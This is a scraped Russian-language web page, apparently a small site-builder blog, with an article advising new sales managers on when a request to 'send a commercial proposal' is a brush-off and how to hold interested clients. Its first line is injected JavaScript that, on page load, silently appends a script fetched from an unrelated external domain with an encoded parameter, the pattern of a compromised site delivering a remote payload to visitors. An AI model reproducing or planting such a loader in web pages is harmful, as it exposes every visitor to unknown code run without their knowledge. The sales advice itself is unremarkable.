script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://prgjc.commentaries-of-current.info' + '/?650279=UxpTVQFFS0hETE5DVBoWEBMWHhY'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window);
Суббота, 23.11.2024, 15:41
Приветствую Вас Гость | RSS

Мой сайт

Мини-чат
Наш опрос
Интересна ли Вам тема "Холодные продажи"
Всего ответов: 7
Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

Коммерческие Предложения

Отправьте нам КП
Отправьте нам коммерческое предложение, мы его обязательно рассмотрим"-
подобный ответ часто слышат начинающие менеджеры и тут же рвутся в бой, готовят коммерческие предложения и шлют, ждут и надеются на результат. Но чаще всего подобные предложения никто не читает

Думаю, Вы можете себе представить, сколько подобных предложений получают руководители. И уделить внимание каждому, человек просто не в состоянии. Поскольку не останется времени на остальные , более важные проблемы. Вычитывать коммерческие предложения обязаны менеджеры по закупкам. Там несколько проще, основным фактором является цена, поэтому и начинающему менеджеру не составит больших проблем выяснить тот «потолок», выше которого , даже лучшее качество не позволит набрать «проходящий бал». К сожалению не каждая компания может себе позволить держать такого специалиста.
Так какую же выбрать тактику, согласиться и проиграть или не соглашаться и тем более проиграть. Ведь Вы практически получаете завуалированную форму отказа. А «ларчик просто открывался». Если человек не задает вопросы и практически не выслушав Вас, просит сбросить коммерческое предложение, то это самый настоящий отказ(конечно есть вариант , что человеку действительно некогда и он КП рассмотрит, но позже). Напротив, если человек интересуется, спрашивает, а в конце просит отправить коммерческое предложение , то в большой долей вероятности , это Ваш клиент. Осталось только не напортачить, с коммерческим предложением.
Большое значение имеет КП в случае, если клиент сам обратился в Вашу компанию и заинтересовался вашими товарами или услугами. В данном случае предложение рассматривается обязательно , как визуальное оформление Ваших слов. А уже после того, как клиент ознакомится с ним, задавать вопросы и давать дополнительную информацию о продукте. В этом случае главное не расслабляться , считая, что клиент который сам позвонил у Вас в «кармане». Клиента надо удержать. Отвечайте на вопросы, задавайте направляющие вопросы, давайте на них четкие , грамотные ответы, убеждайте и тогда на 99 % он ВАШ.




Форма входа
Поиск
Календарь
«  Ноябрь 2024  »
ПнВтСрЧтПтСбВс
    123
45678910
11121314151617
18192021222324
252627282930

Copyright MyCorp © 2024
Счетчик тИЦ и PR